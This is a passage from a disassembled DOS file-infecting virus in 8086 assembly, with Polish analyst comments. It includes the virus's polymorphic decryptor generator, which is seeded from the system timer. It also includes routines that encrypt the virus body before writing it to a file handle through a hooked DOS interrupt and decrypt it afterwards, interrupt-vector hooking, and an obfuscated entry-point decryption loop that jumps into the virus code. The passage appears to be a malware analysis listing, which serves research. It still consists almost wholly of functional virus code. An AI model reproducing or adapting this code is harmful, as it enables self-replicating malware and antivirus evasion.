;9A2B F7 26 E3 00 ADD AX,L0879 ;9A2F 03 06 79 08 MOV CX,DX ;9A33 8B CA MOV BX,AX ;9A35 8B D8 MOV AX,L0871 ;9A37 A1 71 08 MUL WORD PTR DS:0E3H ;9A3A F7 26 E3 00 SUB SI,AX ;9A3E 2B F0 SBB DI,DX ;9A40 1B FA MOV AX,L0877 ;9A42 A1 77 08 ADD AX,10H ;9A45 05 10 00 MOV DS:0C6H,AX ;9A48 A3 C6 00 MOV AX,BX ;9A4B 8B C3 MOV DX,CX ;9A4D 8B D1 SUB BX,SI ;9A4F 2B DE SBB CX,DI ;9A51 1B CF JB L9A6B ;9A53 72 16 PUSH SI ;9A55 56 PUSH DI ;9A56 57 ADD SI,50H ;'P' ;9A57 83 C6 50 ADC DI,0 ;9A5A 83 D7 00 SUB AX,SI ;9A5D 2B C6 SBB DX,DI ;9A5F 1B D7 POP DI ;9A61 5F POP SI ;9A62 5E JB L9AD1 ;9A63 72 6C ADD WORD PTR L0877,87H ;9A65 81 06 77 08 87 00 MOV BYTE PTR DS:0BEH,1 ;9A6B C6 06 BE 00 01 MOV AX,L087F ;9A70 A1 7F 08 ADD AX,10H ;9A73 05 10 00 MOV DS:0C4H,AX ;9A76 A3 C4 00 MOV AX,L087D ;9A79 A1 7D 08 MOV DS:0C2H,AX ;9A7C A3 C2 00 INC WORD PTR L0867 ;9A7F FF 06 67 08 CALL L98AB ;9A83 E8 25 FE JB L9AD1 ;9A86 72 49 MOV BX,AX ;9A88 8B D8 MOV CX,DX ;9A8A 8B CA ADD BX,OFFSET L0869 ;9A8C 81 C3 69 08 ADC CX,0 ;9A90 83 D1 00 MOV DX,DI ;9A93 8B D7 MOV AX,SI ;9A95 8B C6 DIV WORD PTR DS:0E3H ;9A97 F7 36 E3 00 MOV L087F,AX ;9A9B A3 7F 08 PUSH BX ;9A9E 53 PUSH CX ;9A9F 51 PUSH DX ;9AA0 52 MOV BX,DX ;9AA1 8B DA CALL L9AD2 ;9AA3 E8 2C 00 POP DX ;9AA6 5A POP CX ;9AA7 59 POP BX ;9AA8 5B JB L9AD1 ;9AA9 72 26 ADD DX,OFFSET L0821 ;9AAB 81 C2 21 08 MOV L087D,DX ;9AAF 89 16 7D 08 MOV AX,BX ;9AB3 8B C3 MOV DX,CX ;9AB5 8B D1 DIV WORD PTR DS:0E5H ;9AB7 F7 36 E5 00 INC AX ;9ABB 40 MOV L086D,AX ;9ABC A3 6D 08 MOV L086B,DX ;9ABF 89 16 6B 08 CALL L98B4 ;9AC3 E8 EE FD JB L9AD1 ;9AC6 72 09 MOV CX,1CH ;9AC8 B9 1C 00 MOV DX,OFFSET L0869 ;9ACB BA 69 08 CALL L989D ;9ACE E8 CC FD RET_NEAR ;9AD1 C3 L9AD2: XOR AH,AH ;read system timer time counter ;9AD2 32 E4 INT 1AH ;9AD4 CD 1A MOV AX,DX ;9AD6 8B C2 ADD AX,CX ;9AD8 03 C1 PUSH DS ;9ADA 1E POP ES ;9ADB 07 MOV DI,OFFSET L0821 ;9ADC BF 21 08 MOV SI,DI ;9ADF 8B F7 MOV CX,20H ;' ' ;9AE1 B9 20 00 CLD ;9AE4 FC REPZ STOSW ;9AE5 F3 AB CLI ;9AE7 FA MOV BYTE PTR [SI],0EH ;9AE8 C6 04 0E INC SI ;9AEB 46 MOV BYTE PTR [SI],0BBH ;9AEC C6 04 BB INC SI ;9AEF 46 SUB BX,DS:0E7H ;9AF0 2B 1E E7 00 MOV [SI],BX ;9AF4 89 1C INC SI ;9AF6 46 INC SI ;9AF7 46 MOV BYTE PTR [SI],1FH ;9AF8 C6 04 1F INC SI ;9AFB 46 MOV BYTE PTR [SI],0B9H ;9AFC C6 04 B9 INC SI ;9AFF 46 MOV AX,OFFSET L0821 ;9B00 B8 21 08 SUB AX,DX ;9B03 2B C2 MOV [SI],AX ;9B05 89 04 INC SI ;9B07 46 INC SI ;9B08 46 MOV AL,0B2H ;9B09 B0 B2 MOV AH,DS:0E7H ;9B0B 8A 26 E7 00 XOR AH,DH ;9B0F 32 E6 MOV [SI],AX ;9B11 89 04 INC SI ;9B13 46 INC SI ;9B14 46 MOV WORD PTR [SI],OFFSET LC181 ;9B15 C7 04 81 C1 INC SI ;9B19 46 INC SI ;9B1A 46 MOV [SI],DX ;9B1B 89 14 INC SI ;9B1D 46 INC SI ;9B1E 46 DB 83H,0E2H ?? ;9B1F 83 E2 DB 0FH ?? ;9B21 0F MOV BYTE PTR [SI],0EBH ;9B22 C6 04 EB INC SI ;9B25 46 MOV [SI],DL ;9B26 88 14 INC SI ;9B28 46 ADD SI,DX ;9B29 03 F2 MOV BX,SI ;9B2B 8B DE MOV WORD PTR [SI],OFFSET L9700 ;9B2D C7 04 00 97 INC SI ;9B31 46 INC SI ;9B32 46 MOV AX,DS:0E7H ;9B33 A1 E7 00 MOV [SI],AX ;9B36 89 04 INC SI ;9B38 46 INC SI ;9B39 46 MOV BYTE PTR [SI],43H ;'C' ;9B3A C6 04 43 INC SI ;9B3D 46 MOV BYTE PTR [SI],0EBH ;9B3E C6 04 EB INC SI ;9B41 46 MOV DX,L0867 ;9B42 8B 16 67 08 DB 83H,0E2H ?? ;9B46 83 E2 DB 0FH ?? ;9B48 0F MOV [SI],DL ;9B49 88 14 INC SI ;9B4B 46 ADD SI,DX ;9B4C 03 F2 MOV BYTE PTR [SI],0E2H ;9B4E C6 04 E2 SUB BX,SI ;9B51 2B DE SUB BX,2 ;9B53 83 EB 02 INC SI ;9B56 46 MOV [SI],BL ;9B57 88 1C INC SI ;9B59 46 MOV BYTE PTR [SI],0E9H ;9B5A C6 04 E9 MOV DI,OFFSET L0110 ;9B5D BF 10 01 SUB DI,SI ;9B60 2B FE SUB DI,3 ;9B62 83 EF 03 INC SI ;9B65 46 MOV [SI],DI ;9B66 89 3C STI ;9B68 FB MOV SI,OFFSET L07EA ;9B69 BE EA 07 MOV DI,OFFSET L0885 ;9B6C BF 85 08 PUSH DI ;9B6F 57 MOV CX,37H ;'7' ;9B70 B9 37 00 CLD ;9B73 FC REPZ MOVSB ;9B74 F3 A4 MOV AX,OFFSET L351C ;9B76 B8 1C 35 CALL L98C0 ;9B79 E8 44 FD MOV DS:0D7H,BX ;9B7C 89 1E D7 00 MOV DS:0D9H,ES ;9B80 8C 06 D9 00 MOV AX,OFFSET L251C ;9B84 B8 1C 25 MOV DX,OFFSET L08BB ;9B87 BA BB 08 CALL L98C0 ;9B8A E8 33 FD POP AX ;9B8D 58 CALL AX ;9B8E FF D0 PUSHF ;9B90 9C PUSH DS ;9B91 1E MOV AX,OFFSET L251C ;9B92 B8 1C 25 LDS DX,DWORD PTR DS:0D7H ;9B95 C5 16 D7 00 CALL L98C0 ;9B99 E8 24 FD POP DS ;9B9C 1F POPF ;9B9D 9D RET_NEAR ;9B9E C3 L9B9F: MOV SI,0 ;9B9F BE 00 00 MOV CX,OFFSET L0821 ;9BA2 B9 21 08 MOV DL,L082A ;9BA5 8A 16 2A 08 L9BA9: SUB [SI],DL ;9BA9 28 14 INC SI ;9BAB 46 LOOP L9BA9 ;9BAC E2 FB MOV AH,40H ;Write handle ;9BAE B4 40 MOV BX,L0861 ;file handle ;9BB0 8B 1E 61 08 MOV DX,0 ;bufer offset ;9BB4 BA 00 00 MOV CX,0869h ;byte count ;9BB7 B9 69 08 PUSHF ;9BBA 9C CALL DWORD PTR L0863 ;9BBB FF 1E 63 08 JB L9BC3 ;9BBF 72 02 SUB AX,CX ;9BC1 2B C1 PUSHF ;9BC3 9C MOV SI,0 ;9BC4 BE 00 00 MOV CX,OFFSET L0821 ;9BC7 B9 21 08 MOV DL,L082A ;9BCA 8A 16 2A 08 ADD [SI],DL ;9BCE 00 14 INC SI ;9BD0 46 LOOP L9BCE ;9BD1 E2 FB POPF ;9BD3 9D RET_NEAR ;9BD4 C3 ;------------------------------------------------ ; New int 1Ch (user timer tick) handling routine ;------------------------------------------------ IRET ;9BD5 CF ;<------koniec czesci zakodowanej---------------- ;<------ Entry point ---------------------------- L9BD6: PUSH CS ;9BD6 0E MOV BX,0C771h ;skladnik adresu poczatku wirusa;9BD7 BB 71 C7 POP DS ;9BDA 1F MOV CX,13A5h ;skladnik dlugosci wirusa ;9BDB B9 A5 13 MOV DL,0B0H ;klucz kodowania ;9BDE B2 B0 ADD CX,0F47Ch ;coded area length = 821h ;9BE0 81 C1 7C F4 JMP SHORT L9BF2 ;9BE4 EB 0C MOV SI,SP ;9BE6 8B F4 MOV SI,SP ;9BE8 8B F4 MOV SI,SP ;9BEA 8B F4 MOV SI,SP ;9BEC 8B F4 MOV SI,SP ;9BEE 8B F4 MOV SI,SP ;9BF0 8B F4 L9BF2: ADD [BX+0CC44h],DL ;93B5h -> 9BD6 ;9BF2 00 97 44 CC INC BX ;9BF6 43 JMP SHORT L9BFC ;9BF7 EB 03 HLT ;9BF9 F4 MOV SI,SP ;9BFA 8B F4 LOOP L9BF2 ;9BFC E2 F4 JMP L94C5 ;-> jump into virus code ;9BFE E9 C4 F8 HLT ;9C01 F4 MOV SI,SP ;9C02 8B F4 MOV SI,SP ;9C04 8B F4 MOV SI,SP ;9C06 8B F4 MOV SI,SP ;9C08 8B F4 MOV SI,SP ;9C0A 8B F4 MOV SI,SP ;9C0C 8B F4 MOV SI,SP ;9C0E 8B F4 MOV SI,SP ;9C10 8B F4 MOV SI,SP ;9C12 8B F4 MOV SI,SP ;9C14 8B F4 ADD AX,OFFSET L1600 ;9C16 05 00 V0863 dw 16h ;9C18 16 17 V0865 dw 02C1h ;9C1A C1 02 V0867 dw 0013h ;9C1C 13 00 V0869 label byte ;bufor na boot sector S0000 ENDS END L0100